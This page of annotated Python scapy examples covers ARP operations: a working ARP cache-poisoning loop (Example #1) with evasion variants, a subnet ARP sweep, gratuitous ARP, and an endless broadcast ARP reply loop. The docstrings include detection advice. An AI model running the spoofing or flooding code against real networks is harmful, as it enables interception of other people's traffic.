Beispiel #1
def arp_spoof(ip_1, ip_2, ifname='Net1'):
    """Send forged ARP replies to ``ip_1`` once per second until interrupted.

    Each reply tells ``ip_1`` that ``ip_2`` is reachable at this host's MAC
    address. The frame is unicast to the MAC that was resolved for ``ip_1``.
    The loop has no exit condition of its own; it relies on the SIGINT
    handler registered below (``sigint_handler``, not shown here).

    What a defender sees: unsolicited ARP replies (op=2) arriving at ``ip_1``
    about once per second, binding ``ip_2`` to a MAC that is not ``ip_2``'s.
    Controls that catch this include switch-side Dynamic ARP Inspection,
    static ARP entries for gateways, and ARP monitoring that alerts on a
    changed IP-to-MAC binding (for example arpwatch).

    Args:
        ip_1: IP address of the host whose ARP cache receives the forged entry.
        ip_2: IP address this host claims to own in the forged replies.
        ifname: Name of the local interface used for lookups and sending.
    """
    global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname  # declare the module-level globals written below
    g_ip_1 = ip_1  # global copy: IP of the device whose ARP cache is poisoned
    g_ip_2 = ip_2  # global copy: IP of the device this host impersonates
    g_ifname = ifname  # global copy: interface name used for sending

    # Look up this host's IP address on the interface and store it in the global localip.
    localip = get_ip_address(ifname)
    # Look up this host's MAC address on the interface and store it in the global localmac.
    localmac = get_mac_address(ifname)
    # Resolve the real MAC address of ip_1.
    # NOTE(review): if arp_request returns None for an unanswered query, ip_1_mac
    # stays None and is used unchecked below. Confirm against the helper.
    ip_1_mac = arp_request(ip_1, ifname)[1]
    # Resolve the real MAC address of ip_2. It is not used in this function;
    # presumably sigint_handler reads it to restore the genuine mapping. TODO confirm.
    ip_2_mac = arp_request(ip_2, ifname)[1]
    # Install a signal handler: on Ctrl+C (signal.SIGINT), sigint_handler runs.
    signal.signal(signal.SIGINT, sigint_handler)
    while True:  # keeps sending until Ctrl+C arrives
        # op=2: ARP reply
        sendp(Ether(src=localmac, dst=ip_1_mac) / ARP(op=2, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
              iface=kamene_iface(g_ifname),
              verbose=False)
        # op=1: ARP request (disabled variant)
        # sendp(Ether(src=localmac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1), iface = g_ifname, verbose = False)
        # Author's note: the effect is the same when the Ethernet header's source MAC does not match hwsrc in the ARP payload (disabled variant).
        # sendp(Ether(src=ip_1_mac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1), iface = g_ifname, verbose = False)
        # Author's note: with a layer-2 broadcast destination, the impersonated device raises an address-conflict alarm and the spoofed entry is unstable and flaps.
        # For monitoring, this means a duplicate-address alarm on the impersonated host is not a sufficient signal for the unicast form used above.
        # Prints a status line in Chinese naming ip_1 as the spoofed host and ip_2 as the address whose MAC is replaced by the local one.
        print("发送ARP欺骗数据包!欺骗" + ip_1 + ',本机MAC地址为' + ip_2 + '的MAC地址!!!')
        time.sleep(1)
Beispiel #2
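def arp_scan(subnet, ifname='bond0'):
    """ARP-sweep hosts .1 to .254 of the network named by ``subnet`` and print responders.

    Only the first three dotted octets found in ``subnet`` are used. Any prefix
    length or fourth octet in the argument is ignored, so the sweep always
    covers exactly 254 addresses (a /24), whatever mask the caller had in mind.

    All 254 who-has requests are sent as Ethernet broadcasts in one ``srp``
    call with a one-second timeout. On a monitored segment this shows up as a
    burst of ARP requests from a single source.

    Args:
        subnet: Text containing a dotted prefix, e.g. ``'192.168.1.0/24'``.
        ifname: Local interface to send on and to read the source MAC/IP from.
            Defaults to ``'bond0'``, the value that was previously hard-coded.

    Raises:
        IndexError: If ``subnet`` contains no ``a.b.c`` dotted prefix.
    """
    # Raw string: '\d' and '\.' in a plain literal are invalid escape
    # sequences, which newer Python 3 releases warn about.
    prefix = re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3})', subnet)[0]
    destip = [prefix + '.' + str(host) for host in range(1, 255)]

    localmac = get_mac_address(ifname)
    localip = get_ip_address(ifname)

    result_raw = srp(Ether(src=localmac, dst='FF:FF:FF:FF:FF:FF') /
                     ARP(op=1,
                         hwsrc=localmac,
                         hwdst='00:00:00:00:00:00',
                         psrc=localip,
                         pdst=destip),
                     iface=ifname,
                     timeout=1,
                     verbose=False)

    # result_raw[0] holds the answered queries; each entry is indexed below as
    # [1] (the received frame) and then [1] (its second layer, the ARP layer
    # of an Ether/ARP answer).
    answered = result_raw[0].res

    targets = []
    for pair in answered:
        arp_fields = pair[1][1].fields
        # psrc is the responder's IP address, hwsrc its MAC address.
        targets.append([arp_fields['psrc'], arp_fields['hwsrc']])

    for ip, mac in targets:
        # print() call instead of the Python 2 print statement, which is a
        # SyntaxError on Python 3.
        print('Target-IP : %s ; Target-MAC : %s' % (ip, mac))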
Beispiel #3
def gratuitous_arp(ip_address, ifname='ens37'):
    """Broadcast one gratuitous ARP reply binding ``ip_address`` to this host's MAC.

    The frame is an ARP reply (op=2) sent to the Ethernet broadcast address,
    with sender and target IP both set to ``ip_address`` and sender and target
    hardware address both set to the MAC of ``ifname``. Nothing here checks
    that ``ip_address`` is actually configured on ``ifname``; every host on the
    segment that accepts gratuitous ARP will update its cache.

    Args:
        ip_address: IP address announced as belonging to the local MAC.
        ifname: Local interface whose MAC is announced and which sends the frame.
    """
    own_mac = get_mac_address(ifname)

    ether_hdr = kamene.all.Ether(src=own_mac, dst='ff:ff:ff:ff:ff:ff')
    arp_body = kamene.all.ARP(op=2,
                              hwsrc=own_mac,
                              hwdst=own_mac,
                              psrc=ip_address,
                              pdst=ip_address)
    frame = ether_hdr / arp_body

    # NOTE(review): the interface name goes through scapy_iface although the
    # packet is built with kamene.all. Confirm the helper matches the library.
    out_iface = scapy_iface(ifname)
    kamene.all.sendp(frame, iface=out_iface, verbose=False)
Beispiel #4
def arp_request(ip_address, ifname='ens33'):
    """Resolve the MAC address of ``ip_address`` with a single ARP who-has query.

    Sends one ARP request (op=1) from the IP and MAC of ``ifname`` and waits
    up to one second for the first answer.

    Args:
        ip_address: IP address to resolve.
        ifname: Local interface supplying the source addresses and sending the query.

    Returns:
        A tuple ``(ip_address, mac)``. ``mac`` is the ``hwsrc`` field of the
        ARP answer, or ``None`` when an ``AttributeError`` occurs. That covers
        the no-answer case, where the result has no ``getlayer``.
    """
    src_ip = get_ip_address(ifname)
    src_mac = get_mac_address(ifname)
    try:
        query = ARP(op=1,
                    hwsrc=src_mac,
                    hwdst='00:00:00:00:00:00',
                    psrc=src_ip,
                    pdst=ip_address)
        reply = sr1(query,
                    iface=kamene_iface(ifname),
                    timeout=1,
                    verbose=False)
        # A missing reply or a reply without an ARP layer lacks the attribute
        # accessed here and lands in the except branch.
        resolved_mac = reply.getlayer(ARP).fields['hwsrc']
    except AttributeError:
        return ip_address, None
    return ip_address, resolved_mac
Beispiel #5
def arp_reply(ip_address):
    """Broadcast an ARP reply for ``ip_address`` once per second, without end.

    Every frame is an ARP reply (op=2) to the Ethernet broadcast address that
    binds ``ip_address`` to the MAC of interface ``ens33``. Sender and target
    fields are both set to that IP/MAC pair. The loop has no exit condition;
    it runs until the process is interrupted.

    On the wire this is a steady one-per-second stream of broadcast ARP
    replies for a single IP, which ARP monitoring can alert on as a repeated
    or changed IP-to-MAC binding.

    Args:
        ip_address: IP address announced as belonging to the local MAC.
    """
    own_mac = get_mac_address('ens33')
    # NOTE(review): sendp gets no iface argument, so the frame leaves through
    # the library's default interface, which may not be ens33. Confirm.
    while True:  # keeps sending until Ctrl+C arrives
        ether_hdr = Ether(dst='ff:ff:ff:ff:ff:ff', src=own_mac)
        announcement = ARP(op=2,
                           hwsrc=own_mac,
                           hwdst=own_mac,
                           psrc=ip_address,
                           pdst=ip_address)
        sendp(ether_hdr / announcement, verbose=False)
        time.sleep(1)